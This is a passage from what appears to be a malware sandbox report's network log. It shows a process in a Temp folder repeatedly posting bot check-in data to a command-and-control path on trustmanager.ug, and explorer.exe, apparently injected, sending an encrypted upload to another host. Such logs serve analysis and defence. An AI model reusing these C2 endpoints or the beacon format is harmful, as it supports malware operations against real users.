0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:58.792701960 CEST	15391	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49762	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.927931070 CEST	15394	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:58.953825951 CEST	15395	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:58.953864098 CEST	15395	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49763	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.104096889 CEST	15398	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:59.131409883 CEST	15399	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:59.131431103 CEST	15399	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49761	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.139499903 CEST	15400	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: atvcampingtrips.com
Aug 23, 2021 02:08:59.139519930 CEST	15400	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 6e 28 ca ec Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vun(T^LC{(]qu\|%rGZP%ZL}(?#CIuU.F[!/"7@aAnZ>Ozs`
Aug 23, 2021 02:09:00.392416000 CEST	15705	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:59 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49764	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.277359009 CEST	15401	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:59.303632975 CEST	15403	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 